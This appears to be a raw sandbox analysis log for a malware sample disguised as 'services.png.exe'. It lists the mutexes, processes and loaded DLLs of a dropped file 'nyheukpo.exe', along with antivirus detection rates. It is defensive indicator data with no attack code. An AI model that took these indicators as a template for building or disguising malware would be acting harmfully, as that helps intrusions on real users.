                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F571560412859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C5795604228D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0996156047E959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0696F56048E9B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3B8809DD89B8E88D23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A97D56044E899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17B5604168F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD7956042A8D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A57F5604428B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0795956049EAD9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D045795604A28D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D615604BA959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0AD6C56044A989113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D7D5604EA899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0996F56047E9B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07158560496AC9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\0F049BA1BD347AF123957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D021705604C6849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D029635604CE979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D7E5604BA8A9113
                        Source: C:\Users\user\Desktop\services.png.exeMutant created: \Sessions\1\BaseNamedObjects\Global\05BB093DB78BE86D23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7C56046A889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09571560472859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D015605604F2949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0097F5604EE8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D039705604DE849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D035615604D2959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D051745604B6809113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6B56043A9F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D6856049A9C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D055625604B2969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0355B5604D2AF9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0017A5604E68E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E56C560402989113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\6B4D50CDD97DB19D23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0217B5604C68F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E97756040E839113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F163560416979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD7E56043A8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C171560426859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D695604BA9D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E576560402829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A97556044E819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0616E5604869A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D01D6A5604FA9E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0116B5604F69F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0756E5604929A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D635604EA979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\8C2113323E11F26223957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D705604AA849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D019725604FE869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B96156045E959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6856043A9C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D6B5604DA9F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7756049A839113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0855B560462AF9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D725604DA869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F570560412849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D7A5604BA8E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7556046A819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6156043A959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\8ABCBD56388C5C0623957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD6256041A969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197D5604FE899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D039735604DE879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F96A56041E9E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D96256043E969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C160560426949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C97E56042E8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0ED7D56040A899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\7FFBB6ACCDCB57FC23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D735604AA879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\49AE68A7FB9E89F723957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D049735604AE879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D075785604928C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E96256040E969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0157C5604F2889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD7F56045A8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\7CFBB6ACCECB57FC23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07561560492959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D605604BA949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C176560426829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D5B5604EAAF9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397E5604DE8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C16F5604269B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97556041E819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97A56043E8E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\EB2C0736591CE66623957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0896056046E949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D176560436829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7F56046A8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06172560486869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\6A4D50CDD87DB19D23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D011625604F6969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D635604DA979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B57F5604528B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08562560462969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D595604EAAD9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B1795604568D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0656B5604829F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD6B56042A9F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0957E5604728A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD7E56041A8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0797A56049E8E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C16D560426999113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97756043E839113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09D7356047A879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97D56041E899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D029615604CE959113
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3809.tmpJump to behavior
                        Source: services.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: services.png.exeVirustotal: Detection: 84%
                        Source: services.png.exeReversingLabs: Detection: 89%
                        Source: C:\Users\user\Desktop\services.png.exeFile read: C:\Users\user\Desktop\services.png.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\services.png.exe "C:\Users\user\Desktop\services.png.exe"
                        Source: C:\Users\user\Desktop\services.png.exeProcess created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe"
                        Source: C:\Users\user\Desktop\services.png.exeProcess created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\dllhost.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeSection loaded: cryptbase.dll
